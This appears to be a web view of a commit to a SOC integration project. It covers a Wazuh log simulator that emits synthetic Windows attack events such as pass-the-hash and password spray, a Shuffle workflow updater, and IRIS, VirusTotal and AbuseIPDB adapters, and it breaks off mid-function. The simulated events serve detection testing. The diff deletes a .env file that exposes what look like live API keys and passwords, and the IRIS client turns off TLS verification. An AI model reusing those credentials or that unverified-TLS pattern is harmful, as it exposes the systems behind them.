  emit_windows_usecase "A4-08" "A4" "high" "Windows Authentication Successful Pass the Hash RDP" "event_id=4624 account=\"administrator\" logon_type=10 auth_package=\"NTLM\" pth_indicator=true"
  emit_windows_usecase "A4-09" "A4" "high" "Windows Authentication Success from Guest Account" "event_id=4624 account=\"guest\" logon_type=3"
  emit_windows_usecase "A4-10" "A4" "high" "Windows Authentication Interactive Logon Success by Service Account" "event_id=4624 account=\"svc_backup\" logon_type=2"
  emit_windows_usecase "A4-11" "A4" "high" "Windows Account Added to Privileged Custom Group" "event_id=4732 account=\"user3\" target_group=\"SOC-Privileged-Custom\""
  emit_windows_usecase "A4-12" "A4" "high" "Windows Account Added to Privileged Group" "event_id=4728 account=\"user3\" target_group=\"Domain Admins\""
  emit_windows_usecase "A4-13" "A4" "high" "Windows Domain Configure DSRM Password Reset" "event_id=4794 account=\"administrator\" action=\"dsrm-password-reset\""
  # low-severity usecases
  emit_windows_usecase "A4-14" "A4" "low" "Windows Authentication Multiple Fail One Account from Many Sources" "event_id=4625 account=\"user4\" src_count=15 fail_count=28"
  emit_windows_usecase "A4-15" "A4" "low" "Windows Authentication Multiple Fail Many Accounts from One Source" "event_id=4625 src_ip=$(rand_private_ip) account_count=18 fail_count=42"
  emit_windows_usecase "A4-16" "A4" "low" "Windows Authentication Multiple Fail from Guest Account" "event_id=4625 account=\"guest\" fail_count=9"
  emit_windows_usecase "A4-17" "A4" "low" "Windows Authentication Multiple Fail One Account from One Source" "event_id=4625 account=\"user5\" src_ip=$(rand_private_ip) fail_count=10"
  emit_windows_usecase "A4-18" "A4" "low" "Windows Authentication Multiple Interactive Logon Denied" "event_id=4625 account=\"user6\" logon_type=2 fail_count=7"
  emit_windows_usecase "A4-19" "A4" "low" "Windows Authentication Password Spray" "event_id=4625 spray=true src_ip=$(rand_public_ip) attempted_accounts=25"
  emit_windows_usecase "A4-20" "A4" "low" "Windows Authentication Attempt from Disabled Account" "event_id=4625 account=\"disabled.user\" status=\"0xC0000072\""
  emit_windows_usecase "A4-21" "A4" "low" "Windows Domain Account Created" "event_id=4720 account=\"new.domain.user\" account_type=\"domain\""
  emit_windows_usecase "A4-22" "A4" "low" "Windows Local Account Re Enabled" "event_id=4722 account=\"local.user\" account_type=\"local\""
  emit_windows_usecase "A4-23" "A4" "low" "Windows Local Account Created" "event_id=4720 account=\"local.new\" account_type=\"local\""
  emit_windows_usecase "A4-24" "A4" "low" "Windows Domain Account Re Enabled" "event_id=4722 account=\"domain.reenabled\" account_type=\"domain\""
}
276
+
277
# emit_selected_set
# Run the usecase groups implied by SELECTOR. Section selectors (a1..a4,
# optionally with a usecase suffix like a3-05) run just that group; "all" and
# any other value run every group and rely on selector_matches() to prune
# individual usecases.
emit_selected_set() {
  local choice="${SELECTOR,,}"

  case "${choice}" in
    a1|a1-*) emit_a1 ;;
    a2|a2-*) emit_a2 ;;
    a3|a3-*) emit_a3 ;;
    a4|a4-*) emit_a4 ;;
    *)
      # "all" and exact usecase ids fall through to every group;
      # per-usecase filtering happens inside the emitters.
      emit_a1
      emit_a2
      emit_a3
      emit_a4
      ;;
  esac
}
309
+
310
# Startup banner, then the main loop: --forever repeats indefinitely (stop
# with Ctrl+C); otherwise run COUNT rounds with DELAY seconds between rounds
# (no trailing sleep after the final round).
echo "starting proposal-required log simulator"
echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"

if [[ "${FOREVER}" == "true" ]]; then
  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
  trap 'echo; echo "stopped"; exit 0' INT TERM
  while :; do
    emit_selected_set
    sleep "${DELAY}"
  done
else
  round=1
  while (( round <= COUNT )); do
    emit_selected_set
    if (( round < COUNT )); then
      sleep "${DELAY}"
    fi
    round=$(( round + 1 ))
  done
  echo "done"
fi

+ 33 - 5
scripts/send-wazuh-test-events.sh

@@ -4,6 +4,20 @@ set -euo pipefail
4 4
 SCENARIO="${1:-all}"
5 5
 COUNT="${2:-1}"
6 6
 DELAY="${3:-0.3}"
7
+FOREVER="false"
8
+
9
+for arg in "${@:4}"; do
10
+  case "${arg}" in
11
+    --forever)
12
+      FOREVER="true"
13
+      ;;
14
+    *)
15
+      echo "error: unexpected argument '${arg}'"
16
+      echo "usage: scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
17
+      exit 1
18
+      ;;
19
+  esac
20
+done
7 21
 
8 22
 WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
9 23
 WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
@@ -16,6 +30,11 @@ if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
16 30
   exit 1
17 31
 fi
18 32
 
33
+if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
34
+  echo "error: delay must be numeric (example: 0.5)"
35
+  exit 1
36
+fi
37
+
19 38
 emit_syslog() {
20 39
   local msg="$1"
21 40
   local sent="false"
@@ -96,9 +115,18 @@ send_once() {
96 115
   esac
97 116
 }
98 117
 
99
-for ((i=1; i<=COUNT; i++)); do
100
-  send_once
101
-  if [[ "${i}" -lt "${COUNT}" ]]; then
118
+if [[ "${FOREVER}" == "true" ]]; then
119
+  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
120
+  trap 'echo; echo "stopped"; exit 0' INT TERM
121
+  while true; do
122
+    send_once
102 123
     sleep "${DELAY}"
103
-  fi
104
-done
124
+  done
125
+else
126
+  for ((i=1; i<=COUNT; i++)); do
127
+    send_once
128
+    if [[ "${i}" -lt "${COUNT}" ]]; then
129
+      sleep "${DELAY}"
130
+    fi
131
+  done
132
+fi

+ 77 - 0
scripts/update-shuffle-workflow-from-template.sh

@@ -0,0 +1,77 @@
1
#!/usr/bin/env bash
set -euo pipefail

# Overwrite an existing Shuffle workflow with a local JSON template.
#
# Usage:
#   SHUFFLE_API_KEY=xxxx scripts/update-shuffle-workflow-from-template.sh [workflow_id] [template_file]
#
# Env:
#   SHUFFLE_BASE_URL  Shuffle backend base URL (default http://localhost:5001)
#   SHUFFLE_API_KEY   API key (required)

SHUFFLE_BASE_URL="${SHUFFLE_BASE_URL:-http://localhost:5001}"
SHUFFLE_API_KEY="${SHUFFLE_API_KEY:-}"
WORKFLOW_ID="${1:-0b2c5b48-0e02-49a3-8e12-2bc892ac15f9}"
TEMPLATE_FILE="${2:-shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json}"

if [[ -z "${SHUFFLE_API_KEY}" ]]; then
  echo "error: SHUFFLE_API_KEY is required"
  echo "example: SHUFFLE_API_KEY=xxxx scripts/update-shuffle-workflow-from-template.sh"
  exit 1
fi

if [[ ! -f "${TEMPLATE_FILE}" ]]; then
  echo "error: template file not found: ${TEMPLATE_FILE}"
  exit 1
fi

# Private temp files (mktemp) instead of the previous fixed /tmp names: fixed
# paths race between concurrent runs and are a classic /tmp symlink hazard.
tmp_payload="$(mktemp)"
tmp_response="$(mktemp)"
trap 'rm -f -- "${tmp_payload}" "${tmp_response}"' EXIT

# Rewrite the template: force the target workflow id and strip server-managed
# metadata fields so the PUT is treated as a clean update.
python3 - "${TEMPLATE_FILE}" "${WORKFLOW_ID}" > "${tmp_payload}" <<'PY'
import json
import sys

template_file = sys.argv[1]
workflow_id = sys.argv[2]

with open(template_file, "r", encoding="utf-8") as fh:
    wf = json.load(fh)

wf["id"] = workflow_id

# Server-owned bookkeeping fields; the backend repopulates them.
for field in ("created", "edited", "last_runtime", "owner", "updated_by"):
    wf.pop(field, None)

print(json.dumps(wf))
PY

# -w '%{http_code}' writes the HTTP status to stdout while -o captures the
# body, so no separate status file is needed (the original wrote both to
# fixed /tmp paths).
http_status="$(
  curl -sS -o "${tmp_response}" -w "%{http_code}" \
    -X PUT "${SHUFFLE_BASE_URL}/api/v1/workflows/${WORKFLOW_ID}" \
    -H "Authorization: Bearer ${SHUFFLE_API_KEY}" \
    -H "Content-Type: application/json" \
    --data-binary "@${tmp_payload}"
)"
response="$(cat "${tmp_response}")"

if [[ "${http_status}" != "200" ]]; then
  echo "error: workflow update failed (HTTP ${http_status})"
  echo "${response}"
  exit 1
fi

# Summarize the API response; fail if the API reports success=false.
WORKFLOW_UPDATE_RESPONSE="${response}" python3 - <<'PY'
import json
import os
import sys

raw = os.environ.get("WORKFLOW_UPDATE_RESPONSE", "")
try:
    data = json.loads(raw)
except Exception:
    print("updated, but response is not valid JSON:")
    print(raw[:600])
    sys.exit(0)

if isinstance(data, dict) and data.get("success") is False:
    print("error: API returned success=false")
    print(raw)
    sys.exit(1)

workflow_id = data.get("id") if isinstance(data, dict) else None
name = data.get("name") if isinstance(data, dict) else None
print(f"updated: {name or '<unknown>'} id={workflow_id or '<unknown>'}")
PY

Разница между файлами не показана из-за своего большого размера
+ 196 - 0
shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json


+ 67 - 0
shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.md

@@ -0,0 +1,67 @@
1
+# Sample Workflow: Input Trigger -> Condition -> IRIS Ticket
2
+
3
+Workflow file:
4
+
5
+- `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
6
+
7
+## Purpose
8
+
9
+Accept payload data from `soc-integrator`, evaluate a condition, and create a new IRIS ticket when matched.
10
+
11
+Note: In your current environment, `Shuffle Tools 1.2.0` does not include the `webhook` action. This sample uses a supported start node (`repeat_back_to_me`) and should be triggered via `POST /api/v1/workflows/{id}/execute`.
12
+
13
+Condition in sample:
14
+
15
+- `source` in `["soc-integrator", "wazuh", "fortigate"]`
16
+- `severity` in `["high", "critical"]`
17
+
18
+If condition is not matched, workflow exits without ticket creation.
19
+
20
+## Import into Shuffle
21
+
22
+1. Open Shuffle UI.
23
+2. Go to Workflows.
24
+3. Import workflow JSON:
25
+   - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
26
+4. Save and open the workflow.
27
+5. Keep the workflow ID for execute API calls.
28
+
29
+## Update Existing Workflow By ID
30
+
31
+To update an already-created workflow (for example `0b2c5b48-0e02-49a3-8e12-2bc892ac15f9`) with this template:
32
+
33
+```bash
34
+SHUFFLE_BASE_URL="http://localhost:5001" \
35
+SHUFFLE_API_KEY="<YOUR_API_KEY>" \
36
+scripts/update-shuffle-workflow-from-template.sh \
37
+0b2c5b48-0e02-49a3-8e12-2bc892ac15f9 \
38
+shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json
39
+```
40
+
41
+Then open:
42
+
43
+- `http://localhost:3001/workflows/0b2c5b48-0e02-49a3-8e12-2bc892ac15f9`
44
+
45
+## Test Execute Payload
46
+
47
+```bash
48
+curl -sS -X POST "http://localhost:5001/api/v1/workflows/<WORKFLOW_ID>/execute" \
49
+  -H "Authorization: Bearer <SHUFFLE_API_KEY>" \
50
+  -H "Content-Type: application/json" \
51
+  -d '{
52
+    "execution_argument": "{\"event_id\":\"evt-001\",\"source\":\"soc-integrator\",\"severity\":\"high\",\"title\":\"Suspicious VPN login outside Thailand\",\"description\":\"Detected by SOC Integrator rule A3-05\",\"integrator_url\":\"http://soc-integrator:8080\",\"internal_key\":\"\"}"
53
+  }'
54
+```
55
+
56
+## soc-integrator Endpoint Used
57
+
58
+The sample uses:
59
+
60
+- `POST /action/create-iris-case`
61
+
62
+Base URL is supplied from webhook payload field `integrator_url` (default in workflow: `http://soc-integrator:8080`).
63
+
64
+## Notes
65
+
66
+- If your `soc-integrator` route is protected, pass `internal_key` and ensure backend expects `X-Internal-Key`.
67
+- You can tighten/replace the match condition by editing the Python code in action `Condition Match + Create IRIS Ticket`.

+ 0 - 34
soc-integrator/.env

@@ -1,34 +0,0 @@
1
-APP_ENV=dev
2
-LOG_LEVEL=INFO
3
-
4
-SOC_INTEGRATOR_INTERNAL_KEY=dev-internal-key
5
-SOC_INTEGRATOR_DB_HOST=soc-integrator-db
6
-SOC_INTEGRATOR_DB_PORT=5432
7
-SOC_INTEGRATOR_DB_NAME=soc_integrator
8
-SOC_INTEGRATOR_DB_USER=soc_integrator
9
-SOC_INTEGRATOR_DB_PASSWORD=soc_integrator_password
10
-
11
-WAZUH_BASE_URL=https://wazuh.manager:55000
12
-WAZUH_USERNAME=wazuh-wui
13
-WAZUH_PASSWORD=MyS3cr37P450r.*-
14
-WAZUH_INDEXER_URL=https://wazuh.indexer:9200
15
-WAZUH_INDEXER_USERNAME=admin
16
-WAZUH_INDEXER_PASSWORD=SecretPassword
17
-WAZUH_AUTO_SYNC_ENABLED=true
18
-WAZUH_AUTO_SYNC_INTERVAL_SECONDS=5
19
-WAZUH_AUTO_SYNC_QUERY=*
20
-WAZUH_AUTO_SYNC_LIMIT=50
21
-WAZUH_AUTO_SYNC_MINUTES=120
22
-
23
-SHUFFLE_BASE_URL=http://shuffle-backend:5001
24
-SHUFFLE_API_KEY=e9bf8031-038a-4ea9-9639-13eb08d535ab
25
-SHUFFLE_USERNAME=
26
-SHUFFLE_PASSWORD=
27
-
28
-PAGERDUTY_BASE_URL=http://pagerduty-stub
29
-PAGERDUTY_API_KEY=
30
-
31
-IRIS_BASE_URL=https://iriswebapp_nginx:8443
32
-IRIS_API_KEY=mq4FMyrcf255Snt6rgJbdIN67GGA2rQR5eMOjzE62GlQfV8JX6RSw92AHNeCjIWsZa__2IOKv3I6IhZTEPMaqw
33
-IRIS_DEFAULT_CUSTOMER_ID=1
34
-IRIS_DEFAULT_SOC_ID=

+ 2 - 0
soc-integrator/.env.example

@@ -32,3 +32,5 @@ IRIS_BASE_URL=https://iriswebapp_nginx:8443
32 32
 IRIS_API_KEY=
33 33
 IRIS_DEFAULT_CUSTOMER_ID=1
34 34
 IRIS_DEFAULT_SOC_ID=
35
+VIRUSTOTAL_API_KEY=
36
+ABUSEIPDB_API_KEY=

+ 37 - 0
soc-integrator/app/adapters/abuseipdb.py

@@ -0,0 +1,37 @@
1
+from __future__ import annotations
2
+
3
+from typing import Any
4
+
5
+import httpx
6
+
7
+
8
+class AbuseIpdbAdapter:
9
+    def __init__(self, base_url: str, api_key: str) -> None:
10
+        self.base_url = base_url.rstrip("/")
11
+        self.api_key = api_key
12
+
13
+    def _headers(self) -> dict[str, str]:
14
+        return {"Key": self.api_key, "Accept": "application/json"} if self.api_key else {}
15
+
16
+    async def check_ip(self, ip: str, max_age_in_days: int = 90, verbose: bool = True) -> dict[str, Any]:
17
+        if not self.api_key:
18
+            raise RuntimeError("AbuseIPDB API key is not configured")
19
+
20
+        url = f"{self.base_url}/check"
21
+        params = {
22
+            "ipAddress": ip.strip(),
23
+            "maxAgeInDays": max(1, int(max_age_in_days)),
24
+            "verbose": "true" if verbose else "false",
25
+        }
26
+        headers = self._headers()
27
+
28
+        async with httpx.AsyncClient(timeout=20.0) as client:
29
+            response = await client.get(url, headers=headers, params=params)
30
+            try:
31
+                response.raise_for_status()
32
+            except httpx.HTTPStatusError as exc:
33
+                detail = response.text.strip()
34
+                raise RuntimeError(
35
+                    f"AbuseIPDB returned {response.status_code} for {url}. Response: {detail}"
36
+                ) from exc
37
+            return response.json() if response.content else {"status_code": response.status_code}

+ 15 - 0
soc-integrator/app/adapters/iris.py

@@ -62,3 +62,18 @@ class IrisAdapter:
62 62
             response = await client.get(url, headers=headers)
63 63
             response.raise_for_status()
64 64
             return response.json() if response.content else {"status_code": response.status_code}
65
+
66
+    async def list_cases(self, limit: int = 50, offset: int = 0) -> dict[str, Any]:
67
+        headers = self._headers()
68
+        url = f"{self.base_url}/api/v2/cases"
69
+        params = {"limit": max(1, limit), "offset": max(0, offset)}
70
+        async with httpx.AsyncClient(verify=False, timeout=20.0) as client:
71
+            response = await client.get(url, params=params, headers=headers)
72
+            try:
73
+                response.raise_for_status()
74
+            except httpx.HTTPStatusError as exc:
75
+                detail = response.text.strip()
76
+                raise RuntimeError(
77
+                    f"IRIS returned {response.status_code} for {url}. Response: {detail}"
78
+                ) from exc
79
+            return response.json() if response.content else {"status_code": response.status_code}

+ 84 - 0
soc-integrator/app/adapters/virustotal.py

@@ -0,0 +1,84 @@
1
+from __future__ import annotations
2
+
3
+import base64
4
+from typing import Any
5
+
6
+import httpx
7
+
8
+
9
+class VirusTotalAdapter:
10
+    def __init__(self, base_url: str, api_key: str) -> None:
11
+        self.base_url = base_url.rstrip("/")
12
+        self.api_key = api_key
13
+
14
+    def _headers(self) -> dict[str, str]:
15
+        return {"x-apikey": self.api_key} if self.api_key else {}
16
+
17
+    def _build_path(self, ioc_type: str, ioc_value: str) -> str:
18
+        value = ioc_value.strip()
19
+        if ioc_type == "domain":
20
+            return f"/domains/{value}"
21
+        if ioc_type == "ip":
22
+            return f"/ip_addresses/{value}"
23
+        if ioc_type == "hash":
24
+            return f"/files/{value}"
25
+        if ioc_type == "url":
26
+            # VT URL ID is urlsafe base64(url) without trailing "="
27
+            encoded = base64.urlsafe_b64encode(value.encode("utf-8")).decode("utf-8").rstrip("=")
28
+            return f"/urls/{encoded}"
29
+        raise ValueError(f"Unsupported IOC type: {ioc_type}")
30
+
31
+    async def enrich_ioc(self, ioc_type: str, ioc_value: str) -> dict[str, Any]:
32
+        if not self.api_key:
33
+            raise RuntimeError("VirusTotal API key is not configured")
34
+
35
+        path = self._build_path(ioc_type, ioc_value)
36
+        url = f"{self.base_url}{path}"
37
+        headers = self._headers()
38
+
39
+        async with httpx.AsyncClient(timeout=20.0) as client:
40
+            response = await client.get(url, headers=headers)
41
+            try:
42
+                response.raise_for_status()
43
+            except httpx.HTTPStatusError as exc:
44
+                detail = response.text.strip()
45
+                raise RuntimeError(
46
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
47
+                ) from exc
48
+
49
+            return response.json() if response.content else {"status_code": response.status_code}
50
+
51
+    async def upload_file(self, filename: str, content: bytes) -> dict[str, Any]:
52
+        if not self.api_key:
53
+            raise RuntimeError("VirusTotal API key is not configured")
54
+
55
+        url = f"{self.base_url}/files"
56
+        headers = self._headers()
57
+        files = {"file": (filename, content)}
58
+
59
+        async with httpx.AsyncClient(timeout=60.0) as client:
60
+            response = await client.post(url, headers=headers, files=files)
61
+            try:
62
+                response.raise_for_status()
63
+            except httpx.HTTPStatusError as exc:
64
+                detail = response.text.strip()
65
+                raise RuntimeError(
66
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
67
+                ) from exc
68
+            return response.json() if response.content else {"status_code": response.status_code}
69
+
70
+    async def get_analysis(self, analysis_id: str) -> dict[str, Any]:
71
+        if not self.api_key:
72
+            raise RuntimeError("VirusTotal API key is not configured")
73
+        url = f"{self.base_url}/analyses/{analysis_id}"
74
+        headers = self._headers()
75
+        async with httpx.AsyncClient(timeout=20.0) as client:
76
+            response = await client.get(url, headers=headers)
77
+            try:
78
+                response.raise_for_status()
79
+            except httpx.HTTPStatusError as exc:
80
+                detail = response.text.strip()
81
+                raise RuntimeError(
82
+                    f"VirusTotal returned {response.status_code} for {url}. Response: {detail}"
83
+                ) from exc
84
+            return response.json() if response.content else {"status_code": response.status_code}

+ 5 - 0
soc-integrator/app/config.py

@@ -40,5 +40,10 @@ class Settings(BaseSettings):
40 40
     iris_default_customer_id: int = 1
41 41
     iris_default_soc_id: str = ""
42 42
 
43
+    virustotal_base_url: str = "https://www.virustotal.com/api/v3"
44
+    virustotal_api_key: str = ""
45
+    abuseipdb_base_url: str = "https://api.abuseipdb.com/api/v2"
46
+    abuseipdb_api_key: str = ""
47
+
43 48
 
44 49
 settings = Settings()

+ 25 - 0
soc-integrator/app/db.py

@@ -78,6 +78,25 @@ def init_schema() -> None:
78 78
         )
79 79
 
80 80
         cur.execute(
81
+            """
82
+            CREATE TABLE IF NOT EXISTS ioc_trace (
83
+              id BIGSERIAL PRIMARY KEY,
84
+              action TEXT NOT NULL,
85
+              ioc_type TEXT NOT NULL,
86
+              ioc_value TEXT NOT NULL,
87
+              providers JSONB NOT NULL,
88
+              request_payload JSONB NOT NULL,
89
+              response_payload JSONB NOT NULL,
90
+              matched BOOLEAN,
91
+              severity TEXT,
92
+              confidence DOUBLE PRECISION,
93
+              error TEXT,
94
+              created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
95
+            );
96
+            """
97
+        )
98
+
99
+        cur.execute(
81 100
             "CREATE INDEX IF NOT EXISTS idx_incident_events_incident_key_created_at ON incident_events(incident_key, created_at DESC);"
82 101
         )
83 102
         cur.execute(
@@ -86,3 +105,9 @@ def init_schema() -> None:
86 105
         cur.execute(
87 106
             "CREATE INDEX IF NOT EXISTS idx_escalation_audit_incident_key_attempted_at ON escalation_audit(incident_key, attempted_at DESC);"
88 107
         )
108
+        cur.execute(
109
+            "CREATE INDEX IF NOT EXISTS idx_ioc_trace_created_at ON ioc_trace(created_at DESC);"
110
+        )
111
+        cur.execute(
112
+            "CREATE INDEX IF NOT EXISTS idx_ioc_trace_type_value ON ioc_trace(ioc_type, ioc_value);"
113
+        )

+ 430 - 1
soc-integrator/app/main.py

@@ -2,17 +2,22 @@ import asyncio
2 2
 import logging
3 3
 from datetime import datetime, timezone
4 4
 
5
-from fastapi import Depends, FastAPI, HTTPException
5
+from fastapi import Depends, FastAPI, File, HTTPException, UploadFile
6 6
 
7
+from app.adapters.abuseipdb import AbuseIpdbAdapter
7 8
 from app.adapters.iris import IrisAdapter
8 9
 from app.adapters.pagerduty import PagerDutyAdapter
9 10
 from app.adapters.shuffle import ShuffleAdapter
11
+from app.adapters.virustotal import VirusTotalAdapter
10 12
 from app.adapters.wazuh import WazuhAdapter
11 13
 from app.config import settings
12 14
 from app.db import init_schema
13 15
 from app.models import (
14 16
     ActionCreateIncidentRequest,
15 17
     ApiResponse,
18
+    IocEnrichRequest,
19
+    IocEvaluateRequest,
20
+    IrisTicketCreateRequest,
16 21
     ShuffleLoginRequest,
17 22
     ShuffleProxyRequest,
18 23
     TriggerShuffleRequest,
@@ -46,6 +51,14 @@ iris_adapter = IrisAdapter(
46 51
     base_url=settings.iris_base_url,
47 52
     api_key=settings.iris_api_key,
48 53
 )
54
+virustotal_adapter = VirusTotalAdapter(
55
+    base_url=settings.virustotal_base_url,
56
+    api_key=settings.virustotal_api_key,
57
+)
58
+abuseipdb_adapter = AbuseIpdbAdapter(
59
+    base_url=settings.abuseipdb_base_url,
60
+    api_key=settings.abuseipdb_api_key,
61
+)
49 62
 
50 63
 repo = MvpRepository()
51 64
 mvp_service = MvpService(
@@ -297,6 +310,422 @@ async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
297 310
     return ApiResponse(data={"iris": iris_result})
298 311
 
299 312
 
313
+@app.post("/iris/tickets", response_model=ApiResponse)
314
+async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
315
+    case_payload = {
316
+        "case_name": payload.title,
317
+        "case_description": payload.description,
318
+        "case_customer": payload.case_customer or settings.iris_default_customer_id,
319
+        "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
320
+    }
321
+    if payload.payload:
322
+        case_payload.update(payload.payload)
323
+    try:
324
+        iris_result = await iris_adapter.create_case(case_payload)
325
+    except Exception as exc:
326
+        raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
327
+    return ApiResponse(data={"iris": iris_result})
328
+
329
+
330
+@app.get("/iris/tickets", response_model=ApiResponse)
331
+async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
332
+    try:
333
+        iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
334
+    except Exception as exc:
335
+        raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
336
+    return ApiResponse(data={"iris": iris_result})
337
+
338
+
339
+def _build_vt_ioc_result(
340
+    vt: dict[str, object],
341
+    ioc_type: str,
342
+    ioc_value: str,
343
+    malicious_threshold: int,
344
+    suspicious_threshold: int,
345
+) -> tuple[dict[str, object], bool, str, float]:
346
+    stats = (
347
+        (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
348
+        if isinstance(vt, dict)
349
+        else None
350
+    ) or {}
351
+
352
+    malicious = int(stats.get("malicious", 0) or 0)
353
+    suspicious = int(stats.get("suspicious", 0) or 0)
354
+    harmless = int(stats.get("harmless", 0) or 0)
355
+    undetected = int(stats.get("undetected", 0) or 0)
356
+    total = malicious + suspicious + harmless + undetected
357
+    confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
358
+
359
+    matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
360
+    severity = "low"
361
+    if malicious >= 5 or suspicious >= 10:
362
+        severity = "critical"
363
+    elif malicious >= 2 or suspicious >= 5:
364
+        severity = "high"
365
+    elif malicious >= 1 or suspicious >= 1:
366
+        severity = "medium"
367
+
368
+    reason = (
369
+        f"virustotal_stats malicious={malicious} suspicious={suspicious} "
370
+        f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
371
+    )
372
+
373
+    result: dict[str, object] = {
374
+        "ioc_type": ioc_type,
375
+        "ioc_value": ioc_value,
376
+        "matched": matched,
377
+        "severity": severity,
378
+        "confidence": confidence,
379
+        "reason": reason,
380
+        "providers": {
381
+            "virustotal": {
382
+                "stats": stats,
383
+            }
384
+        },
385
+        "raw": {
386
+            "virustotal": vt,
387
+        },
388
+    }
389
+    return result, matched, severity, confidence
390
+
391
+
392
+def _build_abuseipdb_ioc_result(
393
+    abuse: dict[str, object],
394
+    ioc_value: str,
395
+    confidence_threshold: int = 50,
396
+) -> tuple[dict[str, object], bool, str, float]:
397
+    data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
398
+    score = int(data.get("abuseConfidenceScore", 0) or 0)
399
+    total_reports = int(data.get("totalReports", 0) or 0)
400
+    matched = score >= confidence_threshold
401
+
402
+    severity = "low"
403
+    if score >= 90:
404
+        severity = "critical"
405
+    elif score >= 70:
406
+        severity = "high"
407
+    elif score >= 30:
408
+        severity = "medium"
409
+
410
+    confidence = round(score / 100.0, 4)
411
+    reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
412
+    result: dict[str, object] = {
413
+        "ioc_type": "ip",
414
+        "ioc_value": ioc_value,
415
+        "matched": matched,
416
+        "severity": severity,
417
+        "confidence": confidence,
418
+        "reason": reason,
419
+        "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
420
+    }
421
+    return result, matched, severity, confidence
422
+
423
+
424
+@app.post("/ioc/enrich", response_model=ApiResponse)
425
+async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
426
+    providers = [p.lower().strip() for p in payload.providers]
427
+    result: dict[str, object] = {
428
+        "ioc_type": payload.ioc_type,
429
+        "ioc_value": payload.ioc_value,
430
+        "providers_requested": providers,
431
+        "providers": {},
432
+    }
433
+
434
+    if "virustotal" in providers:
435
+        try:
436
+            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
437
+            result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
438
+        except Exception as exc:
439
+            repo.add_ioc_trace(
440
+                action="enrich",
441
+                ioc_type=payload.ioc_type,
442
+                ioc_value=payload.ioc_value,
443
+                providers=providers,
444
+                request_payload=payload.model_dump(mode="json"),
445
+                response_payload={},
446
+                error=str(exc),
447
+            )
448
+            raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
449
+
450
+    if "abuseipdb" in providers:
451
+        if payload.ioc_type != "ip":
452
+            result["providers"] = {
453
+                **(result.get("providers") or {}),
454
+                "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
455
+            }
456
+        else:
457
+            try:
458
+                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
459
+                result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
460
+            except Exception as exc:
461
+                repo.add_ioc_trace(
462
+                    action="enrich",
463
+                    ioc_type=payload.ioc_type,
464
+                    ioc_value=payload.ioc_value,
465
+                    providers=providers,
466
+                    request_payload=payload.model_dump(mode="json"),
467
+                    response_payload={},
468
+                    error=str(exc),
469
+                )
470
+                raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
471
+
472
+    repo.add_ioc_trace(
473
+        action="enrich",
474
+        ioc_type=payload.ioc_type,
475
+        ioc_value=payload.ioc_value,
476
+        providers=providers,
477
+        request_payload=payload.model_dump(mode="json"),
478
+        response_payload=result,
479
+    )
480
+    return ApiResponse(data={"ioc": result})
481
+
482
+
483
+@app.post("/ioc/evaluate", response_model=ApiResponse)
484
+async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
485
+    providers = [p.lower().strip() for p in payload.providers]
486
+    supported = {"virustotal", "abuseipdb"}
487
+    requested = [p for p in providers if p in supported]
488
+    if not requested:
489
+        raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
490
+
491
+    per_provider: dict[str, dict[str, object]] = {}
492
+    errors: dict[str, str] = {}
493
+
494
+    if "virustotal" in requested:
495
+        try:
496
+            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
497
+            vt_result, _, _, _ = _build_vt_ioc_result(
498
+                vt=vt,
499
+                ioc_type=payload.ioc_type,
500
+                ioc_value=payload.ioc_value,
501
+                malicious_threshold=payload.malicious_threshold,
502
+                suspicious_threshold=payload.suspicious_threshold,
503
+            )
504
+            per_provider["virustotal"] = vt_result
505
+        except Exception as exc:
506
+            errors["virustotal"] = str(exc)
507
+
508
+    if "abuseipdb" in requested:
509
+        if payload.ioc_type != "ip":
510
